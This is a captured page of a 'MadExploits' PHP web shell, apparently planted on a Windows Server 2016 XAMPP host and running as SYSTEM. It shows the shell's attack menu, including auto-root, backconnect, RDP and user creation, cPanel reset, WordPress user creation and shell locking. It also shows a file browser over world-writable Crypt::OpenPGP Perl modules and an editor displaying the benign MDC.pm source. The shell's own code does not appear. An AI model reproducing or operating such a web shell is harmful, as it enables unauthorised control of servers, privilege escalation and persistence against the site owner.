Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
vendor /
lib /
Crypt /
OpenPGP /
[ HOME SHELL ]
Name
Size
Permission
Action
Key
[ DIR ]
drwxrwxrwx
Signature
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
Armour.pm
7.91
KB
-rw-rw-rw-
Buffer.pm
2.11
KB
-rw-rw-rw-
CFB.pm
2.73
KB
-rw-rw-rw-
Certificate.pm
15.95
KB
-rw-rw-rw-
Cipher.pm
5.92
KB
-rw-rw-rw-
Ciphertext.pm
7.01
KB
-rw-rw-rw-
Compressed.pm
4.92
KB
-rw-rw-rw-
Config.pm
3.01
KB
-rw-rw-rw-
Constants.pm
2.39
KB
-rw-rw-rw-
Digest.pm
4.36
KB
-rw-rw-rw-
ErrorHandler.pm
2.37
KB
-rw-rw-rw-
Key.pm
6.11
KB
-rw-rw-rw-
KeyBlock.pm
3.64
KB
-rw-rw-rw-
KeyRing.pm
8.08
KB
-rw-rw-rw-
KeyServer.pm
4.32
KB
-rw-rw-rw-
MDC.pm
2.5
KB
-rw-rw-rw-
Marker.pm
893
B
-rw-rw-rw-
Message.pm
4.32
KB
-rw-rw-rw-
OnePassSig.pm
1.46
KB
-rw-rw-rw-
PacketFactory.pm
8.63
KB
-rw-rw-rw-
Plaintext.pm
3.24
KB
-rw-rw-rw-
S2k.pm
6.05
KB
-rw-rw-rw-
SKSessionKey.pm
6.15
KB
-rw-rw-rw-
SessionKey.pm
6.69
KB
-rw-rw-rw-
Signature.pm
12.44
KB
-rw-rw-rw-
Trust.pm
797
B
-rw-rw-rw-
UserID.pm
2.03
KB
-rw-rw-rw-
Util.pm
4.85
KB
-rw-rw-rw-
Words.pm
11.23
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : MDC.pm
package Crypt::OpenPGP::MDC; use strict; use Crypt::OpenPGP::Digest; use Crypt::OpenPGP::ErrorHandler; use base qw( Crypt::OpenPGP::ErrorHandler ); sub new { my $mdc = bless { }, shift; $mdc->init(@_); } sub init { my $mdc = shift; my %param = @_; if (my $data = $param{Data}) { my $dgst = Crypt::OpenPGP::Digest->new('SHA1'); $mdc->{body} = $dgst->hash($data); } $mdc; } sub digest { $_[0]->{body} } sub parse { my $class = shift; my($buf) = @_; my $mdc = $class->new; $mdc->{body} = $buf->get_bytes($buf->length - $buf->offset); $mdc; } sub save { $_[0]->{body} } 1; __END__ =head1 NAME Crypt::OpenPGP::MDC - MDC (modification detection code) packet =head1 SYNOPSIS use Crypt::OpenPGP::MDC; my $mdc = Crypt::OpenPGP::MDC->new( Data => 'foobar' ); my $digest = $mdc->digest; my $serialized = $mdc->save; =head1 DESCRIPTION I<Crypt::OpenPGP::MDC> is a PGP MDC (modification detection code) packet. Such a packet is used alongside Encrypted-MDC data packets so that modifications to the ciphertext can be detected. The MDC packet contains a C<SHA-1> digest of the plaintext for comparison with the decrypted plaintext. You generally will never need to construct a I<Crypt::OpenPGP::MDC> packet yourself; usage is by the I<Crypt::OpenPGP::Ciphertext> object. =head1 USAGE =head2 Crypt::OpenPGP::MDC->new( [ Data => $data ] ) Creates a new MDC packet object and returns that object. If you do not supply any data I<$data>, the object is created empty; this is used, for example, in I<parse> (below), to create an empty packet which is then filled from the data in the buffer. If you wish to initialize a non-empty object, supply I<new> with the I<Data> parameter along with a value I<$data>. I<$data> should contain the plaintext prefix (length = cipher blocksize + 2), the actual plaintext, and two octets corresponding to the hex digits C<0xd3> and C<0x14>. =head2 $mdc->save Returns the text of the MDC packet; this is the digest of the data passed to I<new> (above) as I<$data>, for example. =head2 Crypt::OpenPGP::MDC->parse($buffer) Given I<$buffer>, a I<Crypt::OpenPGP::Buffer> object holding (or with offset pointing to) an MDC packet, returns a new <Crypt::OpenPGP::MDC> object, initialized with the MDC data in the buffer. =head2 $mdc->digest Returns the MDC digest data (eg. the string passed as I<$data> to I<new>, above). =head1 AUTHOR & COPYRIGHTS Please see the Crypt::OpenPGP manpage for author, copyright, and license information. =cut
Close